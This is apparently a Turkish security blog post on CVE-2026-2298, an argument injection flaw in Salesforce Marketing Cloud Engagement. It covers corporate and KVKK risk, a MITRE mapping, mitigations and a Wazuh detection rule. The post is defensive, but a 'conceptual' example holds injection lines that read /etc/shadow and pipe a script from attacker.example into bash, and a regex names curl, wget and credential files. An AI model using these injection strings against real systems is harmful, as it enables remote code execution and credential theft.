Salesforce Marketing Cloud Engagement’ın web servis katmanında keşfedilen bir argüman enjeksiyonu (argument injection) açığı, CVSS puanı 9.4 ile kritik eşiğini rahatlıkla aşıyor. Dünya genelinde binlerce kurumun pazarlama otomasyon altyapısı olarak kullandığı bu platformun, Ocak 2026 öncesi sürümleri bu zafiyetten etkileniyor. Peki sizin kurumunuz bu platforma entegre bir sistemi çalıştırıyorsa, bu açığın servis hesabınızda ne gibi bir kapı araladığını hiç düşündünüz mü?
🔍 Zafiyet Nedir? Argüman Enjeksiyonu Neden Bu Kadar Tehlikeli?
CVE-2026-2298, CWE-88 olarak sınıflandırılan “Komutta Argüman Ayraçlarının Hatalı Nötrleştirilmesi” (Improper Neutralization of Argument Delimiters in a Command) kategorisine giriyor. Teknik olarak bu şu anlama geliyor: Salesforce Marketing Cloud Engagement’ın web servis arayüzüne gönderilen bir istekteki parametreler, arka planda çalışan bir komut veya servis çağrısına argüman olarak aktarılırken yeterince doğrulanmıyor. Saldırgan, bu noktaya özel karakterler veya ayraçlar (delimiter) yerleştirerek komutun yorumlanma biçimini değiştirebiliyor.
Argüman enjeksiyonu, SQL Injection kadar kamuoyunda bilinen bir zafiyet türü değil; ama sonuçları çoğu zaman çok daha sessiz ve ölümcül olabiliyor. SQL Injection veritabanı katmanında patlıyor ve çoğu WAF (web uygulama güvenlik duvarı) tarafından yakalanabiliyor. Argüman enjeksiyonu ise çoğunlukla uygulama sunucusu veya servis katmanında gerçekleşiyor, dolayısıyla geleneksel imza tabanlı savunmaların radarına girmiyor. NIST’in açıkladığı zafiyet özetinde “Web Services Protocol Manipulation” ifadesi geçiyor; bu, saldırının SOAP veya REST tabanlı web servis protokolü üzerinden tetiklendiğine işaret ediyor.
⚠️ Saldırı Nasıl Çalışır? Protokol Manipülasyonu Ne Demek?
Marketing Cloud Engagement, kurumların e-posta kampanyaları, SMS akışları ve müşteri yolculuklarını yönettiği bir platform. Bu platform, CRM sistemleri, veri ambarları ve diğer kurumsal uygulamalarla entegre çalışmak için kapsamlı bir web servis API’si sunuyor. Bir saldırgan bu zafiyeti istismar etmek için meşru bir API isteğini manipüle ediyor: İstekte yer alan parametreye argüman ayracı olarak işlev görebilecek karakterler (örneğin --, ;, |, boşluk karakterleri veya platforma özgü ayraçlar) ekliyor. Arka planda bu parametreyi kullanan servis, enjekte edilen argümanları kendi bağlamında yorumluyor ve planlanmayan bir işlem gerçekleştiriyor.
Yetkilendirme kontrolleri bu tür saldırılarda genellikle çok az yardımcı oluyor. Çünkü istek, meşru kimlik bilgileriyle yapılıyor; sorun yetkilendirmede değil, gelen verinin işlenme biçiminde. Bu açıdan bakıldığında zafiyetin CVSS 9.4 alması şaşırtıcı değil; gizlilik, bütünlük ve erişilebilirlik üçlüsü üzerindeki etkisi yüksek olarak değerlendirilmiş demek.
Aşağıda, bu tür bir web servis isteğinde argüman enjeksiyonunun nasıl görünebileceğini gösteren basitleştirilmiş bir örnek var. Bu örnek gerçek bir istismar kodu değil; savunma ekiplerine farkındalık kazandırmak için hazırlanmış kavramsal bir gösterimdir:
# Kavramsal örnek: Marketing Cloud SOAP API üzerinden argüman enjeksiyonu girişimi
# Gerçek bir saldırı aracı değil; SOC analistleri için farkındalık gösterimi
# Normal bir SOAP isteğindeki parametre:
# kampanya_adi
# Enjeksiyon girişimi - ayraç karakteri ile argüman kaçırma:
# kampanya_adi --config /etc/shadow
# kampanya_adi; curl http://attacker.example/shell.sh | bash
# Wazuh ile bu tür şüpheli API isteklerini tespit etmek için
# Marketing Cloud API loglarını izleyen özel kural örneği:
# /var/ossec/etc/rules/salesforce_mc_rules.xml
<group name="salesforce,marketing_cloud,argument_injection,">
<rule id="100500" level="12">
<if_group>web</if_group>
<regex type="pcre2">(?i)(--|;|\||\$\(|`|%0a|%0d).*(?:config|passwd|shadow|bash|curl|wget|exec)</regex>
<description>Marketing Cloud API: Olası argüman enjeksiyonu girişimi tespit edildi</description>
<mitre>
<id>T1059</id>
<id>T1190</id>
</mitre>
<group>attack,argument_injection,salesforce</group>
</rule>
<rule id="100501" level="10">
<if_group>web</if_group>
<match>ExactTargetAPI|Marketing Cloud</match>
<regex type="pcre2">(?i)(--[a-z]|/[a-z]{2,}/(?:etc|tmp|var|proc))</regex>
<description>Marketing Cloud API: Şüpheli yol veya argüman bayrağı içeren istek</description>
<mitre>
<id>T1190</id>
</mitre>
<group>attack,salesforce,web_attack</group>
</rule>
</group>
Bu kuralı devreye almak için Wazuh manager üzerinde aşağıdaki adımı izleyebilirsiniz:
# Kural dosyasını oluşturduktan sonra Wazuh manager'ı yeniden yükleyin
sudo systemctl restart wazuh-manager
# Kuralın aktif olduğunu doğrulayın
sudo /var/ossec/bin/ossec-logtest -t
🏢 Kimin İçin Önemli? Türkiye’deki Kurumsal Risk Profili
Salesforce Marketing Cloud, Türkiye’de bankacılık, perakende, telekom ve sigorta sektörlerinde yoğun biçimde kullanılıyor. Özellikle büyük ölçekli e-posta kampanyaları, müşteri segmentasyonu ve pazarlama otomasyonu için tercih edilen bu platform, tipik olarak kurumun CRM, ERP ve veri ambarı sistemleriyle derin entegrasyonlar kuruyor. Bu entegrasyonlar, zafiyetin gerçek tehdit profilini belirleyen unsur.
Şöyle düşünün: Marketing Cloud’a bağlı bir servis hesabı, müşteri verilerini senkronize etmek için CRM sistemine yazma yetkisine sahip olabilir. Saldırgan bu zafiyeti istismar ederse yalnızca Marketing Cloud’u değil, o servis hesabının erişebildiği tüm sistemleri tehdit altına sokar. Bu, SaaS platformlarının yarattığı klasik “pivot noktası” riskidir: Zayıf halka neredeyse orada başlıyor, ama patlama yarıçapı çok daha geniş.
Ayrıca KVKK açısından değerlendirmek gerekiyor. Marketing Cloud’da işlenen veriler doğrudan kişisel veri niteliği taşıyor: müşteri e-postaları, telefon numaraları, satın alma davranışları, segmentasyon verileri. Bu tür bir ihlal, yalnızca teknik bir güvenlik olayı değil; aynı zamanda Kişisel Verileri Koruma Kurulu’na bildirim yükümlülüğü doğurabilecek bir veri ihlali senaryosu.
🛡️ MITRE ATT&CK Eşleşmesi
Bu zafiyet, MITRE ATT&CK çerçevesinde birden fazla teknikle örtüşüyor:
- T1190 – Exploit Public-Facing Application (Halka Açık Uygulama İstismarı): Zafiyet, dışarıdan erişilebilen web servis arayüzü üzerinden tetikleniyor; bu da ilk erişim (initial access) vektörü olarak T1190 ile doğrudan örtüşüyor.
- T1059 – Command and Scripting Interpreter (Komut ve Betik Yorumlayıcısı): Argüman enjeksiyonunun başarılı olması durumunda arka planda komut yürütülmesi söz konusu olabileceğinden T1059 de devreye giriyor.
- T1078 – Valid Accounts (Geçerli Hesaplar): Saldırı, meşru API kimlik bilgileriyle gerçekleştirilebileceğinden, gügüvenliği ihlal edilmiş bir servis hesabı senaryosunda T1078 ile de bağlantılı.
- T1565 – Data Manipulation (Veri Manipülasyonu): Web servis protokolü üzerinden gerçekleşen manipülasyon, platform içindeki veri akışlarını değiştirebilir.
🔧 Ne Yapmalısınız? Aksiyon Listesi
Salesforce, bu zafiyeti Ocak 2026 itibarıyla kendi tarafında yamadığını belirtiyor. Ancak “vendor yamaladı, iş bitti” yaklaşımı SaaS platformlarında hiçbir zaman yeterli olmuyor. Yapmanız gerekenler şunlar:
- Entegrasyon envanterinizi çıkarın: Marketing Cloud’a hangi sistemlerin bağlı olduğunu, hangi servis hesaplarının API erişimi kullandığını ve bu hesapların yetkilerinin ne kadar geniş olduğunu belgeleyin. Fazla yetkili servis hesapları derhal kısıtlanmalı.
- API erişim loglarını geriye dönük inceleyin: Ocak 2026 öncesine ait Marketing Cloud API loglarında anomali var mı? Özellikle alışılmadık parametre uzunlukları, beklenmedik karakterler veya sıra dışı kaynak IP’lerden gelen istekler dikkat işareti.
- Wazuh ile API log izlemesini etkinleştirin: Marketing Cloud’un erişim loglarını Wazuh’a besleyin ve yukarıdaki kural setini devreye alın. Wazuh’un Active Response özelliğiyle şüpheli istekleri otomatik olarak engelleyebilirsiniz.
- Servis hesabı yetkilerini en aza indirin: Marketing Cloud’a bağlı servis hesapları yalnızca ihtiyaç duydukları asgari yetkilere sahip olmalı. Salt okunur erişim yeterliyse yazma yetkisi hiçbir zaman verilmemeli.
- WAF kurallarını güncelleyin: Argüman enjeksiyonu girişimlerine özgü imzaları WAF’ınıza ekleyin. Özellikle SOAP isteklerinde parametre içinde
--,;,|gibi komut ayraçlarını filtreleyen kurallar tanımlayın. - KVKK ihlal senaryosunu değerlendirin: Eğer Ocak 2026 öncesinde Marketing Cloud API’nize yönelik anormal trafik gözlemlediyseniz, bunu yalnızca teknik bir olay olarak değil; potansiyel bir kişisel veri ihlali olarak ele alın ve hukuk biriminizle değerlendirin.
📊 Wazuh Perspektifi: SaaS Logları Kör Nokta Olmamalı
Biz kurumda Wazuh ile çalışırken sık karşılaştığımız bir tablo var: Şirketin kendi altyapısı Wazuh tarafından kapsamlı biçimde izleniyor, ama SaaS platformlarından gelen loglar merkezi SIEM’e hiç beslenmiyor. Marketing Cloud, Salesforce CRM, HubSpot, Marketo gibi platformlar, güvenlik ekiplerinin radarında genellikle kör nokta olarak kalıyor. CVE-2026-2298 tam da bu kör noktanın ne kadar riskli olabileceğini gösteriyor.
Salesforce Marketing Cloud, API etkinlik loglarını Audit Log ve Data Management Platform üzerinden dışa aktarma imkânı sunuyor. Bu logları bir S3 bucket’a veya doğrudan bir log toplayıcıya yönlendirip Wazuh’un FIM ve log izleme yetenekleriyle ilişkilendirebilirsiniz. Böylece hem SaaS katmanında hem de uç noktalarda koordineli bir görünürlük elde edersiniz.
Son bir not: Bu zafiyet, SaaS platformlarına olan “kör güven” sorununu bir kez daha gündeme getiriyor. “Salesforce gibi büyük bir şirket güvenliği halleder” varsayımı, CVSS 9.4 bir açığın mümkün olduğunu kanıtlıyor. Paylaşılan sorumluluk modeli (shared responsibility model) gerçek; platformun kendisi yamalansa bile entegrasyon katmanınızın, servis hesaplarınızın ve log izleme altyapınızın güvenliği size ait.
Orijinal kaynak: https://nvd.nist.gov/vuln/detail/CVE-2026-2298
Bir Cevap Yazın